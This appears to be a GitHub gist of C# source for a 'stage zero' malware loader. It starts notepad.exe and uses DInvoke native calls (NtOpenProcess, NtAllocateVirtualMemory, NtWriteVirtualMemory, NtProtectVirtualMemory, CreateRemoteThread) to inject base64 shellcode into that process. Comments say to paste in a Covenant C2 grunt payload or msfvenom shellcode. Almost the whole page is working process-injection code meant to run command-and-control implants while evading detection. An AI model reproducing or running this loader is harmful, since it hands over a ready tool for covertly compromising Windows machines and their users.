Skip to content

Instantly share code, notes, and snippets.

Last active March 18, 2022 21:01
Show Gist options
  • Save ChoiSG/e84e9ae9aa325b477e49264ffef56097 to your computer and use it in GitHub Desktop.
Save ChoiSG/e84e9ae9aa325b477e49264ffef56097 to your computer and use it in GitHub Desktop.
stage zero using dinvoke to inject donut'ed covenant grunt
using System;
using System.Runtime.InteropServices;
using System.Diagnostics;
using DynamicInvoke = DInvoke.DynamicInvoke;
// Install DInvoke, Fody, and Costura Fody through Nuget
namespace stagezero
class Program
static void Main(string[] args)
// Covenant saves base64 shellcode launcher in opt/Covenant/Covenant/Data/Temp/<grunt_profile>.bin.b64
// Simply `xclip -selection c < opt/Covenant/Covenant/Data/Temp/GruntHTTP.bin.b64` and we are good to go!
string gruntx64 = "<your_grunt_base64ed_shellcode>";
// Or you can just use a messagebox shellcode - msfvenom -a x64 --platform windows -p windows/x64/messagebox TEXT="hello world" -f csharp
// or w/e shellcode you like
byte[] sc = Convert.FromBase64String(gruntx64);
var process = Process.Start("C:\\Windows\\System32\\notepad.exe");
var pid = (uint)process.Id;
Console.WriteLine("[+] Notepad pid: " + pid);
IntPtr procHandle = DynamicInvoke.Native.NtOpenProcess(pid, DInvoke.Data.Win32.Kernel32.ProcessAccessFlags.PROCESS_ALL_ACCESS);
Console.WriteLine("[+] NtOpenProcess - Opening notepad processs");
IntPtr baseAddr = IntPtr.Zero;
IntPtr regionSize = (IntPtr)sc.Length;
IntPtr alloc = DynamicInvoke.Native.NtAllocateVirtualMemory(procHandle, ref baseAddr, IntPtr.Zero, ref regionSize, 0x1000 | 0x2000, 0x04);
Console.WriteLine("[+] NtAllocateVirtualMemory - Allocating memory: " + regionSize + " bytes");
uint ntWVMemory = DynamicInvoke.Native.NtWriteVirtualMemory(procHandle, alloc, Marshal.UnsafeAddrOfPinnedArrayElement(sc, 0), (uint)sc.Length);
Console.WriteLine("[+] NtWriteVirtualMemory - Writing shellcode to notepad.exe: 0x" + alloc.ToInt64().ToString("x2"));
var ntPVMemory = DynamicInvoke.Native.NtProtectVirtualMemory(procHandle, ref alloc, ref regionSize, (uint)0x20);
Console.WriteLine("[+] NtProtectVirtualMemory - Changing permission to RX");
var pCreateRemoteThread = DynamicInvoke.Generic.GetLibraryAddress("kernel32.dll", "CreateRemoteThread");
IntPtr threadId = IntPtr.Zero;
var crtResult = DInvoke.DynamicInvoke.Win32.CreateRemoteThread(procHandle, IntPtr.Zero, 0, alloc, IntPtr.Zero, 0, ref threadId);
Console.WriteLine("[+] CreateRemoteThread - Starting shellcode...\n\n");
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment